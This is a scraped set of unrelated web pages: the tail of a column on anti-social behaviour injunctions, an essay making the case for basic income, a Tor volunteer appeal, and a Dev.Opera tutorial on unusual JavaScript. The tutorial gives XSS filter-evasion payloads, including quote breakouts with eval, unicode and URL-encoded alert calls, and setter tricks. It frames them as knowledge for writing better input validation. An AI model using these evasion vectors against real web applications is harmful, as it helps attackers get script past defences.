Lord Macdonald, formerly the director of public prosecutions, points out that "it is difficult to imagine a broader concept than causing 'nuisance' or 'annoyance'. The phrase is apt to catch a vast range of everyday behaviours to an extent that may have serious implications for the rule of law". Protesters, buskers, preachers: all, he argues, could end up with ipnas.

The Home Office minister, Norman Baker, once a defender of civil liberties, now the architect of the most oppressive bill pushed through any recent parliament, claims that the amendments he offered in December will "reassure people that basic liberties will not be affected". But Liberty describes them as "a little bit of window-dressing: nothing substantial has changed."

The new injunctions and the new dispersal orders create a system in which the authorities can prevent anyone from doing more or less anything. But they won't be deployed against anyone. Advertisers, who cause plenty of nuisance and annoyance, have nothing to fear; nor do opera lovers hogging the pavements of Covent Garden. Annoyance and nuisance are what young people cause; they are inflicted by oddballs, the underclass, those who dispute the claims of power.

These laws will be used to stamp out plurality and difference, to douse the exuberance of youth, to pursue children for the crime of being young and together in a public place, to help turn this nation into a money-making monoculture, controlled, homogenised, lifeless, strifeless and bland. For a government which represents the old and the rich, that must sound like paradise.

Twitter: @georgemonbiot

A fully referenced version of this article can be found at monbiot.com

Why we should give free money to everyone


Comments:"Why we should give free money to everyone"

URL:https://decorrespondent.nl/541/why-we-should-give-free-money-to-everyone/31639050894-e44e2c00


London, May 2009. (Read the Dutch version of this article here.) A small experiment involving thirteen homeless men takes off. They are street veterans. Some of them have been sleeping on the cold tiles of The Square Mile, the financial center of the world, for more than forty years. Their presence is far from cheap. Police, legal services, healthcare: the thirteen cost taxpayers hundreds of thousands of pounds. Every year.

That spring, a local charity takes a radical decision. The street veterans are to become the beneficiaries of an innovative social experiment. No more food stamps, food kitchen dinners or sporadic shelter stays for them. The men will get a drastic bailout, financed by taxpayers. They'll each receive 3,000 pounds, cash, with no strings attached. The men are free to decide what to spend it on; counseling services are completely optional. No requirements, no hard questions. The only question they have to answer is:

What do you think is good for you?

Gardening classes

‘I didn’t have enormous expectations,’ an aid worker recalls.

Yet the desires of the homeless men turned out to be quite modest. A phone, a passport, a dictionary - each participant had his own ideas about what would be best for him. None of the men wasted their money on alcohol, drugs or gambling. On the contrary, most of them were extremely frugal with the money they had received. On average, only 800 pounds had been spent at the end of the first year. 

Simon’s life was turned upside down by the money. Having been addicted to heroin for twenty years, he finally got clean and began taking gardening classes. ‘For the first time in my life everything just clicked, it feels like now I can do something’, he says. ‘I’m thinking of going back home. I’ve got two kids.’

A year after the experiment had started, eleven out of thirteen had a roof over their heads. They accepted accommodation, enrolled in education, learnt how to cook, got treatment for drug use, visited their families and made plans for the future. ‘I loved the cold weather,’ one of them remembers. ‘Now I hate it.’ After decades of the authorities’ fruitless pushing, pulling, fines and persecution, eleven notorious vagrants finally moved off the streets. (The Joseph Rowntree Foundation did a study of this experiment.)

Costs? 50,000 pounds a year, including the wages of the aid workers. In addition to giving eleven individuals another shot at life, the project had saved money by a factor of at least 7. Even The Economist concluded:

‘The most efficient way to spend money on the homeless might be to give it to them.’

Santa exists

We tend to presume that the poor are unable to handle money. If they had any, people reason, they would probably spend it on fast food and cheap beer, not on fruit or education. This kind of reasoning nourishes the myriad of social programs, administrative jungles, armies of program coordinators and legions of supervising staff that make up the modern welfare state. Since the start of the crisis, the number of initiatives battling fraud with benefits and subsidies has surged.

People have to ‘work for their money,’ we like to think. In recent decades, social welfare has become geared toward a labor market that does not create enough jobs. The trend from 'welfare' to 'workfare' is international, with obligatory job applications, reintegration trajectories, mandatory participation in 'voluntary' work. The underlying message: Free money makes people lazy.

Except that it doesn’t. 

Meet Bernard Omandi. For years he worked in a quarry, somewhere in the inhospitable west of Kenya. Bernard made $2 a day, until one morning he received a remarkable text message. ‘When I saw the message, I jumped up’, he later recalled. And with good reason: $500 had just been deposited into his account. For Bernard, the sum amounted to almost a year’s salary.

A couple of months later a New York Times reporter walked around his village (read the NYT article here). It was like everyone had won the jackpot - but no one had wasted the money. People were repairing their homes and starting small businesses. Bernard was making $6 to $9 a day driving around on his new Bajai Boxer, an Indian motorcycle which he used to provide transportation for local residents. ‘This puts the choice in the hands of the poor, and not me,’ Michael Faye, co-founder of GiveDirectly, the coordinating organization, said. ‘The truth is, I don’t think I have a very good sense of what the poor need.’ When Google had a look at his data, the company immediately decided to donate $2.5 million.

Bernard and his fellow villagers are not the only ones who got lucky. In 2008, the Ugandan government gave about $400 to almost 12,000 youths between the ages of 16 and 35. Just money – no questions asked. And guess what? The results were astounding. A mere four years later, the youths’ educational and entrepreneurial investments had caused their incomes to increase by almost 50%. Their chances of being employed had increased by 60%. (The study: 'Experimental Evidence from Uganda'.)

Another Ugandan program awarded $150 to 1,800 poor women in the North of the country. Here, too, incomes went up significantly. The women who were supported by an aid worker were slightly better off, but later calculations proved that the program would have been even more effective had the aid workers’ salary simply been divided among the women as well. (And the other study from Uganda.)

Studies from all over the world drive home the exact same point: free money helps. Proven correlations exist between free money and a decrease in crime, lower inequality, less malnutrition, lower infant mortality and teenage pregnancy rates, less truancy, better school completion rates, higher economic growth and emancipation rates. ‘The big reason poor people are poor is because they don’t have enough money’, economist Charles Kenny, a fellow at the Center for Global Development, dryly remarked last June. ‘It shouldn’t come as a huge surprise that giving them money is a great way to reduce that problem.’ (Read his article here.)

Free-money programs have flourished in the past decade

In the 2010 work Just Give Money to the Poor, researchers from the Organization for Economic Cooperation and Development (OECD) give numerous examples of money being scattered successfully. In Namibia, malnourishment, crime and truancy fell 25 percent, 42 percent and nearly 40 percent respectively. In Malawi, school enrollment of girls and women rose 40 percent in conditional and unconditional settings. From Brazil to India and from Mexico to South Africa, free-money programs have flourished in the past decade. While the Millennium Development Goals did not even mention the programs, by now more than 110 million families in at least 45 countries benefit from them.

OECD researchers sum up the programs’ advantages: (1) households make good use of the money, (2) poverty decreases, (3) long-term benefits in income, health, and tax income are remarkable, (4) there is no negative effect on labor supply – recipients do not work less, and (5) the programs save money. (Here is a presentation of their findings.) Why would we send well-paid foreigners in SUVs when we could just give cash? This would also diminish the risk of corrupt officials taking their share. Free money stimulates the entire economy: consumption goes up, resulting in more jobs and higher incomes.

‘Poverty is fundamentally about a lack of cash. It's not about stupidity,’ author Joseph Hanlon remarks. ‘You can't pull yourself up by your bootstraps if you have no boots.’

An old idea

The idea has been propagated by some of history’s greatest minds. For example: Thomas Paine, John Stuart Mill, H.G. Wells, George Bernard Shaw, John Kenneth Galbraith, Jan Tinbergen, Martin Luther King and Bertrand Russell. Thomas More dreamt of it in his famous Utopia (1516). Countless economists and philosophers, many of them Nobel laureates, would follow suit. Proponents cannot be pinned down on the political spectrum: it appeals to both left- and right-wing thinkers. Even the founders of neoliberalism, Friedrich Hayek and Milton Friedman, supported the idea. Article 25 of the Universal Declaration of Human Rights (1948) directly refers to it.

The basic income. 

And not just for a few years, in developing countries only, or merely for the poor – but free money as a basic human right for everyone. The philosopher Philippe van Parijs has called it ‘the capitalist road to communism.’ A monthly allowance, enough to live off, without any outside control on whether you spend it well or whether you even deserve it. No jungle of extra charges, benefits, rebates - all of which cost tons to implement. At most with some extras for the elderly, unemployed and disabled.

The basic income - it is an idea whose time has come.

Mincome, Canada

In an attic of a warehouse in Winnipeg, Canada, 1,800 boxes are accumulating dust. The boxes are filled with data – tables, graphs, reports, transcripts – from one of the most fascinating social experiments in postwar history: Mincome. 

Evelyn Forget, professor at the University of Manitoba, heard about the experiment in 2004. For five years, she courted the Canadian National Archive to get access to the material. When she was finally allowed to enter the attic in 2009, she could hardly believe her eyes: this archive stored a wealth of information on the application of Thomas More’s age-old ideal. 

One of the almost 1,000 interviews tucked away in boxes was with Hugh and Doreen Henderson. Thirty-five years earlier, when the experiment took off, he worked as a school janitor and she took care of their two kids. Life had not been easy for them. Doreen grew vegetables and they kept their own chickens in order to secure their daily food supply.

From that moment, money was no longer a problem

One day the doorbell rang. Two men wearing suits made an offer the Henderson family couldn’t refuse. ‘We filled out forms and they wanted to see our receipts’, Doreen remembers. From that moment, money was no longer a problem for the Henderson family. Hugh and Doreen entered Mincome (read more about their experience here) – the first large-scale social experiment in Canada and the biggest experiment implementing a basic income ever conducted.

In March 1973 the governor of the province had decided to reserve $17 million for the project. The experiment was to take place in Dauphin, a small city with 13,000 inhabitants north of Winnipeg. The following spring researchers began to crowd the town to monitor the development of the pilot. Economists were keeping track of people’s working habits, sociologists looked into the experiment’s effects on family life and anthropologists engaged in close observation of people’s individual responses.

The basic income regulations had to ensure no one would drop below the poverty line. In practice this meant that about 1,000 families in Dauphin, covering 30% of the total population, received a monthly paycheck. For a family of five, the amount would come down to $18,000 a year today (figure corrected for inflation). No questions asked.

Four years passed until a round of elections threw a spanner in the works. The newly elected conservative government didn’t like the costly experiment, 75% of which was financed by the Canadian taxpayer. When it turned out that there was not even enough money to analyze the results, the initiators decided to pack the experiment away. In 1,800 boxes.

The Dauphin population was bitterly disappointed. At its start in 1974, Mincome was seen as a pilot project that might eventually go national. But now it seemed to be destined for oblivion. ‘Government officials opposed to Mincome didn't want to spend more money to analyze the data and show what they already thought: that it didn't work,’ one of the researchers remembers. ‘And the people who were in favor of Mincome were worried because if the analysis was done and the data wasn't favorable then they would have just spent another million dollars on analysis and be even more embarrassed.’

When professor Forget first heard of Mincome, no one knew how the experiment had truly worked out. However, 1970 had also been the year Medicare, the national health insurance system, had been implemented. The Medicare archives provided Forget with a wealth of data allowing her to compare Dauphin to surrounding towns and other control groups. For three years, she analyzed and analyzed, consistently coming to the same conclusion: 

Mincome had been a great success. 

From experiment to law

‘Politicians feared that people would stop working, and that they would have lots of children to increase their income,’ professor Forget says. (You can find one of her lectures here.) Yet the opposite happened: the average marital age went up while the birth rate went down. The Mincome cohort had better school completion records. The total amount of work hours decreased by only 13%. Breadwinners hardly cut down on their hours, women used the basic income for a couple of months of maternity leave and young people used it to do some extra studying.

Forget’s most remarkable discovery is that hospital visits went down by 8.5%. This amounted to huge savings (in the United States it would be more than $200 billion a year now). After a couple of years, domestic violence rates had dropped and mental health had improved. Mincome made the entire town healthier. The basic income continued to influence subsequent generations, both in terms of income and health.

Dauphin, the town with no poverty, was one of five North American basic income experiments. Four U.S. projects preceded it. Today, few people know how close the US was in the sixties to implementing a solid social welfare system that could stand comparison with those of most Western European countries today. In 1964, president Lyndon B. Johnson declared a ‘war on poverty.’ Democrats and Republicans were united in their ambition to fundamentally reform social security. But first more testing was needed.

Several tens of millions were made available to test the effects of a basic income among 10,000 families in Pennsylvania, Indiana, North Carolina, Seattle and Denver. The pilots were the first large-scale social experiments differentiating between various test and control groups. The researchers were trying to find the answers to three questions. 1: Does a basic income make people work significantly less? 2: If so, will it make the program unaffordable? 3: And would it consequently become politically unattainable? 

The answers: no, no and yes.

The decrease in working hours turned out to be limited. ‘The ‘laziness’ contention is just not supported by our findings’, the chief data analyst of the Denver experiment said. ‘There is not anywhere near the mass defection the prophets of doom predicted.’ On average, the decline in work hours amounted to 9 percent per household. Like in Dauphin, the majority of this drop was caused by young mothers and students in their twenties.

‘These declines in hours of paid work were undoubtedly compensated in part by other useful activities, such as search for better jobs or work in the home,’ an evaluative report of a Seattle project concluded.  A mother who had never finished high school got a degree in psychology and went on to a career in research. Another woman took acting classes, while her husband started composing. ‘We’re now self-sufficient, income-earning artists’, they told the researchers. School results improved in all experiments: grades went up and dropout rates went down. Nutrition and health data were also positively affected – for example, the birth weight of newborn babies increased.

For a while, it seemed like the basic income would fare well in Washington.

WELFARE REFORM IS VOTED IN HOUSE, a NYT headline on April 17, 1970 read. An overwhelming majority had endorsed President Nixon’s proposal for a modest basic income. But once the proposal got to the Senate, doubts returned. ‘This bill represents the most extensive, expensive and expansive welfare legislation ever handled by the Committee on Finance,’ one of the senators said.

Then came that fatal discovery: the number of divorces in Seattle had gone up by more than 50%. This percentage made the other, positive results seem utterly uninteresting. It gave rise to the fear that a basic income would make women much too independent. For months, the law proposal was sent back and forth between the Senate and the White House, eventually ending in the dustbin of history.

Later analysis would show that the researchers had made a mistake – in reality the number of divorces had not changed.

Futile, dangerous and perverse

‘It Can Be Done! Conquering Poverty in the US by 1976’, James Tobin, who would go on to win a Nobel Prize, wrote in 1967. At that time, almost 80% of the American population was in favor of adopting a small basic income. (Here is an interesting article about this episode of American history.) Nevertheless, Ronald Reagan sneered years later: ‘In the sixties we waged a war on poverty, and poverty won.’

Almost 80% of the American population was in favor of adopting a small basic income

Milestones of civilization are often first considered impossible utopias. Albert Hirschman, one of the great sociologists of the previous century, wrote that utopian dreams are usually rebutted on three grounds: futility (it is impossible), danger (the risks are too big) and perversity (its realization will result in the opposite: a dystopia). Yet Hirschman also described how, once implemented, ideas previously considered utopian are quickly accepted as normal.

Not so long ago, democracy was a grand utopian ideal. From the radical philosopher Plato to the conservative aristocrat Joseph de Maistre, most intellectuals considered the masses too stupid for democracy. They thought that the general will of the people would quickly degenerate into some general’s will instead. Apply this kind of reasoning to the basic income: it would be futile because we would not be able to afford it, dangerous because people would stop working, and perverse because we would only have to work harder to clean up the mess it creates. 

But wait a second. 

Futile? For the first time in history we are rich enough to finance a robust basic income. It would allow us to cut most of the benefits and supervision programs that the current social welfare system necessitates. Many tax rebates would be redundant. Further financing could come from (higher) taxing of capital, pollution and consumption.

Eradicating poverty in the United States would cost $175 billion – a quarter of the country’s $700 billion military budget. 

A quick calculation. The country I live in, Holland, has 16.8 million inhabitants. Its poverty line is set at $1,300 a month. This would make for a reasonable basic income. Some simple math would set the cost at 193.5 billion euros annually, about 30% of our national GDP. That’s an astronomically high figure. But remember: the government already controls more than half of our GDP. It does not keep the Netherlands from being one of the richest, most competitive and happiest countries in the world.

The basic income that Canada experimented with – free money as a right for the poor – would be much cheaper. Eradicating poverty in the United States would cost $175 billion, economist Matt Bruenig recently calculated – a quarter of the country’s $700 billion military budget. You can find his calculation here. Still, a system that only helps the poor confirms the divide with the well-to-do. ‘A policy for the poor is a poor policy,’ Richard Titmuss, the mastermind of the British welfare state, once wrote. A universal basic income, on the other hand, can count on broad support since everyone benefits.

Dangerous? Indeed, we would work a little less. But that’s a good thing, with the potential of working wonders for our personal and family lives. A small group of artists and writers (‘all those whom society despises while they are alive and honors when they are dead’ – Bertrand Russell) may actually stop doing paid work. Nevertheless, there is plenty of evidence that the great majority of people, regardless of what grants they would receive, want to work. Unemployment makes us very unhappy. 

One of the perks of the basic income is that it stimulates the ‘working poor’ – who are, under the current system, more secure receiving welfare payments – to look for jobs. The basic income can only improve their situation; the grant would be unconditional. Minimum wage could be abolished, improving employment opportunities at the lower end of the labor market. Age would no longer need to form an obstacle to finding and keeping employment (as older employees would not necessarily earn more), thereby boosting overall labor participation.

The welfare state was built to provide security but degenerated into a system of shame

Perverse? On the contrary, over the last decades our social security systems have degenerated into perverse systems of social control. Government officials spy on people receiving welfare to make sure they are not wasting their money. Inspectors spend their days coaching citizens to help them make sense of all the necessary paperwork. Thousands of government officials are kept busy keeping an eye on this fraud-sensitive bureaucracy. The welfare state was built to provide security but degenerated into a system of distrust and shame.

Think different

It has been said before. Our welfare state is out of date, based on a time in which men were the sole breadwinners and employees stayed with one company for their entire careers. Our pension system and unemployment protection programs are still centered around those lucky enough to have steady employment. Social security is based on the wrong premise that the economy creates enough jobs. Welfare programs have become pitfalls instead of trampolines.

Never before has the time been so ripe to implement a universal and unconditional basic income. Our ageing societies are challenging us to keep the elderly economically active for as long as possible. An increasingly flexible labor market creates the need for more security. Globalization is eroding middle-class wages worldwide. Women’s emancipation will only be completed when greater financial independence is possible for all. The deepening divide between the low- and highly educated means that the former are in need of extra support. The rise of robots and the increasing automation of our economy could cost even those at the top of the ladder their jobs.

Legend has it that while Henry Ford II was giving a tour around a new, fully automatic factory to union leader Walter Reuther in the 1960s, Ford joked:

'Walter, how are you going to get those robots to pay your union dues?'

Reuther is said to have replied:

'Henry, how are you going to get them to buy your cars?'

A world where wages no longer rise still needs consumers. In the last decades, middle-class purchasing power has been maintained through loans, loans and more loans. The Calvinistic reflex that you have to work for your money has turned into a license for inequality.

No one is suggesting societies the world over should implement an expensive basic income system in one stroke. Each utopia needs to start small, with experiments that slowly turn our world upside down — like the one four years ago in the City of London. (Switzerland may be the first country to introduce a basic income.) One of the aid workers later recalled: 'It’s quite hard to just change overnight the way you’ve always approached this problem. These pilots give us the opportunity to talk differently, think differently, describe the problem differently.'

That is how all progress begins.

Translated from Dutch by Tabitha Speelman.

The short version of this article was published in The Washington Post: 'Free money might be the best way to end poverty'.

 

Tor website needs your help! | The Tor Blog


Comments:"Tor website needs your help! | The Tor Blog"

URL:https://blog.torproject.org/blog/tor-website-needs-your-help


Tor started more than eleven years ago. The project website has gone through three major revisions in that time. It looks like it’s again time for important changes.

Tor has shifted in recent years from being a project prominently used by researchers, developers, and security experts to one with the wider audience of anyone concerned about their privacy. Tor’s user base continues to grow. While this is very good news for the anonymity of every Tor user, we need to make the information that matters more accessible and better structured. The support team already receives close to 30 new requests every day, and it would be a better experience for newcomers, users, and journalists to find their answers directly.

Creating the ideal website for Tor is not an easy task. We have very diverse audiences with very diverse expectations. We need to gather information from different sources. Some pages should be multi-lingual. As outdated information could endanger our users, the site should be easy to keep up to date. Our users deserve beautiful, clear, and comprehensive graphics to allow everyone to quickly understand Tor better. We’ve had some initial discussions, but we’re very much in need of your help.

Up to the challenge? Do you want to help improve a website visited every day by millions of people looking for protection against surveillance? Then feel free to join the website team mailing list. We need usability experts, technical writers, designers, code wizards of the modern web, static website generator experts, documentalists… Join us and help!

JavaScript for hackers - Dev.Opera


Comments:"JavaScript for hackers - Dev.Opera"

URL:http://dev.opera.com/articles/view/opera-javascript-for-hackers-1/


By garethheyes

Introduction

I love to use JavaScript in unexpected ways, to create code that looks like it shouldn't work but does, or that produces some unexpected behavior. This may sound trivial, but the results I've found lead to some very useful techniques. Each of the techniques described can be used for XSS filter evasion, which was my original intention when developing them. However, learning such JavaScript can dramatically increase your knowledge of the language, helping you become better at cleaning up input and increasing web application security.

So read on and enjoy my weird and wonderful JavaScript hacks.

RegExp replace can execute code

When using regular expressions with replace the second argument supports a function assignment. In Opera it seems you can use this argument to execute code. For example, check out the code snippet below:

'XSS'.replace(/XSS/g,alert)

This results in alert('XSS'); this works because the match from the RegExp is passed to the alert function as an argument. Normally you would use a function to perform another routine on the matched text, like so:

'somestring'.replace(/some/, function($1){ /* do something with the matched text */ })

But as you can see in the first example in this section, instead of a user-defined function we are executing a native alert call, and the arguments are passed to the native call from the regular expression. It's a cool trick that could be used to evade some XSS filters: for example, if you inject a string and then follow it with a dot, you can call any function you like.
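
To see concretely that it is the matched text which gets handed to the callback, here is a harmless stand-in for alert (my own illustration, not part of the original article):

// A safe substitute for alert: log whatever the replace callback receives.
function show(match) {
  console.log('callback received: ' + match);
  return match;                 // return the match unchanged so the string is not altered
}

'XSS'.replace(/XSS/g, show);    // logs "callback received: XSS"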

To see how this is used in an XSS context, imagine we have an unfiltered " in the string where the injection occurs, such as a JavaScript event or a script tag. First we inject our payload alert(1), then we break out of the quotes with a " and continue with our regular expression:

.replace(/.+/,eval)//

Notice I use eval here to execute any code I like and the regular expression matches everything so that the full payload is passed to eval.

If I put all the code together and show you the output of the page it is easier to understand what is going on:

Page output:

<script>somevariableUnfiltered="YOUR INPUT"</script>

The above code is common in analytics scripts where your search string is stored by an advertising company. You often don't see these scripts, but if you view the source of a web page you'll find they are a regular occurrence; forums are another place where they are prevalent. "YOUR INPUT" is the string you have control of; when that input isn't filtered correctly, this is also referred to as DOM-based XSS.

Input:

alert(1)".replace(/.+/,eval)//

Resulting output:

<script>somevariableUnfiltered="alert(1)".replace(/.+/,eval)//"</script>

Notice the single line comment used to remove the trailing quote.

Unicode escapes

Although unicode escapes can't be used to represent syntax such as parentheses, you can escape the name of the function being called, for example:

\u0061\u006c\u0065\u0072\u0074(1)

This calls alert(1); \u indicates a unicode escape, and the four hex digits that follow specify the character. \u0061 is "a", and so on.

Mixing and matching unicode escapes is possible with normal characters; the example below demonstrates this:

\u0061lert(1)

You can also include them in strings and even evaluate them using eval. Unicode escapes differ from normal hex or octal escapes in that they can appear not only inside a string but also in a reference to a function, variable or object.
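As a rough sketch of that difference (the variable foo below is my own illustration, not from the original article), a unicode escape can form part of an identifier reference, while a hex escape is only meaningful inside a string:

var foo = alert; // any function reference would do
\u0066\u006f\u006f(1) // the escapes spell out the identifier foo, so this calls alert(1)
'\x61lert' // a hex escape only builds the string "alert"; \x61lert(1) outside quotes is a syntax error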

The example below shows how to use unicode escapes that are evaluated and split into separate parts:

eval('\\u'+'0061'+'lert(1)')

By avoiding literal function names like alert, we can fool XSS filters into letting our code through. This very example was used to bypass PHPIDS (an open source IDS), and its rules were subsequently made much stronger as a result. If you are decoding JavaScript for malware analysis at runtime, you need to consider all the ways multiple levels of encoding can combine; as this example shows, it won't be an easy task.
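To give a feel for how the layers stack, here is a minimal sketch of two levels of decoding (my own illustration, not the PHPIDS bypass itself): the inner eval turns the escaped string literal back into plain source, and the outer eval runs it.

var inner = '\\u0061\\u006c\\u0065\\u0072\\u0074(1)'; // the characters \u0061\u006c\u0065\u0072\u0074(1), not yet decoded
eval(eval('"' + inner + '"')); // the inner eval decodes the escapes to "alert(1)", the outer eval executes it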

JavaScript parser engine

JavaScript is a very dynamic language. It can execute a surprising amount of code that at first glance doesn't look valid; however, once you know how the parser works, you begin to understand the logic behind it.

JavaScript doesn't know the result of a function until it is executed; it has to call the function before it knows the type of the value returned. This leads to an interesting quirk: if the returned value isn't valid for the surrounding expression, an error only occurs after the function has already executed.

What does this mean in English? Well, code speaks louder than words, so check out this example:

+alert(1)--

The alert function executes and returns undefined, but by then it is too late: the decrement operator needs an operand it can assign back to, and the value returned by the call isn't one, so an error is raised.

Here are a few more valid examples that don't raise errors but are interesting nevertheless.

+alert(1)
1/alert(1)
alert(1)>>>/abc/

You might think the above examples are pointless, but in fact they offer great insight into how JavaScript works. Once you understand the small details, the bigger picture becomes clear, and the way your code executes helps you understand how the parser works. I find these sorts of examples useful when tracking down syntax errors, hunting DOM-based XSS, and exploiting XSS filters.

Throw, Delete what?

You can use the delete operator in ways that you wouldn't at first expect, which results in some pretty wacky syntax. Let's see what happens if we combine the throw, delete, not and typeof operators:

throw delete~typeof~alert(1)

Even though you'd think it couldn't possibly work, it's possible to call delete on a function call and it still executes:

delete alert(1)

Here are a few more examples:

delete~[a=alert]/delete a(1)
delete [a=alert],delete a(1)

At first glance you'd think these would raise a syntax error, but on closer examination the code sort of makes sense. The parser first finds a variable assignment inside an array literal, performs the assignment, and then deletes the array. Likewise, the delete is performed after the function call because the parser needs the result of the call before it can apply delete to the returned value, even if that value is undefined.
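To make the evaluation order explicit, here is the second example again with each step annotated (my comments; the behaviour is unchanged):

delete [a = alert], // the array literal evaluates first, assigning alert to a; delete then acts on the discarded array
delete a(1) // a(1) runs alert(1); delete is applied to the value the call returns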

Again, these examples have been used to defeat XSS filters, because filters often try to match valid-looking syntax and don't expect code this obscure. You should bear such examples in mind when writing your application's data validation.

Global objects are statements

In certain instances of XSS filter evasion, it can be useful to send English-like text hidden within a vector. Clever systems like PHPIDS use English and vector comparisons to determine if a request is an attack or not, so it is a useful way to test these systems.

Using global objects/functions on their own can produce English-like code blocks. In fact, on the sla.ckers security forum we had a little game to produce English-like sentences in JavaScript. To get an idea of how it works, check out the following example:

stop, open, print && alert(1)

I coined the name Javascriptlish because it's possible to produce some crazy looking code:

javascript : /is/^{ a : ' weird ' }[' & wonderful ']/" language "
the_fun: ['never '] + stop['s']

We use the regular expression /is/ with the ^ operator, then create an object { a : ' weird ' } (which has a property a assigned the value ' weird '). We then look up the property ' & wonderful ' on the object we just created, and divide the result by the string " language ".

Next we use a label called the_fun, an array containing 'never ', and the s property of the global stop function, all of which is valid syntax. The same two lines are annotated below.
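Re-reading the vector as plain JavaScript (my annotations; the code itself is unchanged):

javascript: /is/ ^ { a: ' weird ' }[' & wonderful '] / " language " // a label, then regex XOR (property lookup divided by a string)
the_fun: ['never '] + stop['s'] // another label, then an array concatenated with the s property of the global stop function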

Getters/Setters fun

When Firefox added its custom syntax for setters, it enabled some interesting XSS vectors that didn't use parentheses. Opera doesn't support the custom syntax yet; this is good from a security point of view, but not from a JavaScript hacker's perspective.

Opera does, however, support the standard __defineSetter__ method. This enables us to call functions via assignments, which still has some use for XSS filter evasion:

__defineSetter__('x',alert); x=1;

In case you're not familiar with setters and getters, the example above creates a setter for the global variable x. A setter is called whenever the variable is assigned a value, and that value is supplied to it as an argument. The second argument to __defineSetter__ is the function to call on assignment, which here is alert. So when x is assigned the value 1, the alert function is called with 1 as its argument.
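A getter can be abused the same way in reverse. Here is a minimal sketch using the equally old __defineGetter__ method (my addition, not part of the original article), where simply reading the variable fires the function:

window.__defineGetter__('x', function(){ alert(1); }); // the getter runs every time x is read
x; // reading x calls the getter, which pops alert(1)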

Location allows url encoding

The location object accepts URL encoding within the JavaScript code assigned to it. This lets you further obfuscate XSS vectors by double encoding them.

location='javascript:%61%6c%65%72%74%28%31%29'

Combining them with unicode escapes can hide strings quite nicely:

location='javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)'

The first example works because the URL bar in Opera accepts URL-encoded strings, so you can hide JavaScript syntax by URL encoding it. This is useful because, when the payload is passed within an XSS vector, you can double URL encode it to help further with filter evasion.

The second example combines the first technique with the unicode escape technique mentioned previously. So when you decode the string it results in the unicode representation of alert which is \u0061\u006c\u0065\u0072\u0074.
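As a rough sketch of the two decode steps (decodeURIComponent here only stands in for whatever decodes the injected parameter first; the javascript: URL itself provides the second decode):

var doubly = '%2561%256c%2565%2572%2574%2528%2531%2529'; // alert(1) URL encoded twice: each % becomes %25
var singly = decodeURIComponent(doubly); // one decode yields "%61%6c%65%72%74%28%31%29"
location = 'javascript:' + singly; // the javascript: URL is decoded once more on navigation, running alert(1)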

This article is licensed under a Creative Commons Attribution, Non Commercial - Share Alike 2.5 license.

[TLS] This working group has failed
